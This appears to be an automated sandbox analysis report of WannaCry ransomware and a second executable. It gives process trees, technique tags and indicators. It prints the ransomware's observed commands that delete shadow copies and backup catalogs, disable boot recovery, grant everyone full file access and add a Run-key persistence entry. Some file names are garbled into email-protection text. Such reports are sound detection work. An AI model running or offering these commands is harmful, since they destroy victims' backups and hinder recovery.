PID 2216 wrote to memory of 2532	2216	ADZP 20 Complex.exe	cmd.exe
PID 2068 wrote to memory of 4528	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4528	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 4840	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 3752	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 3752	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe
PID 2068 wrote to memory of 2228	2068	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 43 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
9024	attrib.exe
7148	attrib.exe
17908
4864
14928
1372	attrib.exe
9612	attrib.exe
16092
5300
5592	attrib.exe
7500	attrib.exe
16400
20808
6604	attrib.exe
10488	attrib.exe
9136	attrib.exe
5000	attrib.exe
7736	attrib.exe
12392	attrib.exe
9044
3756	attrib.exe
6056	attrib.exe
16400	attrib.exe
11312
13240	attrib.exe
8604	attrib.exe
1764	attrib.exe
6184	attrib.exe
6720	attrib.exe
11660	attrib.exe
5540
9032	attrib.exe
10952	attrib.exe
11272	attrib.exe
20632
15948	attrib.exe
6044	attrib.exe
4492	attrib.exe
18876
700	attrib.exe
5736	attrib.exe
15136	attrib.exe
4516	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f"
1⤵
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7436.tmp\7437.tmp\7438.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f""
  2⤵
  - Drops autorun.inf file
  PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa2d9d3cb8,0x7ffa2d9d3cc8,0x7ffa2d9d3cd8
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:8
  2⤵
  PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
  2⤵
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5348 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5360 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:3372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6288 /prefetch:8
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5828 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1716 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
  2⤵
  PID:3108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,16919881843612476089,6069703591489626835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3460

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5024

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4172

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3268

C:\Users\Admin\Desktop\WannaCry.EXE
"C:\Users\Admin\Desktop\WannaCry.EXE"
1⤵
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:3564
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:1764
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2920
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 45421715382876.bat
  2⤵
  PID:2144
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    PID:3760
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - Views/modifies file attributes
  PID:700
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2492
- - C:\Users\Admin\Desktop\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:4716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:4176
- - C:\Users\Admin\Desktop\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3160
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:4976
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1328
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4948
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious use of SetWindowsHookEx
  PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vrdysqporewuolg188" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vrdysqporewuolg188" /t REG_SZ /d "\"C:\Users\Admin\Desktop\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:3716
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3872
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1640
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2344
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2840
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2916
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2212
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:940
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2036
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2192
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1900
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3060
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1204
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4888
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4832
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1952
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2908
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4640
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:784
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2528
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2860
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2908
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5104
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2544
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:684
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5004
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1892
- C:\Users\Admin\Desktop\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1272
- C:\Users\Admin\Desktop\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Users\Admin\Desktop\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
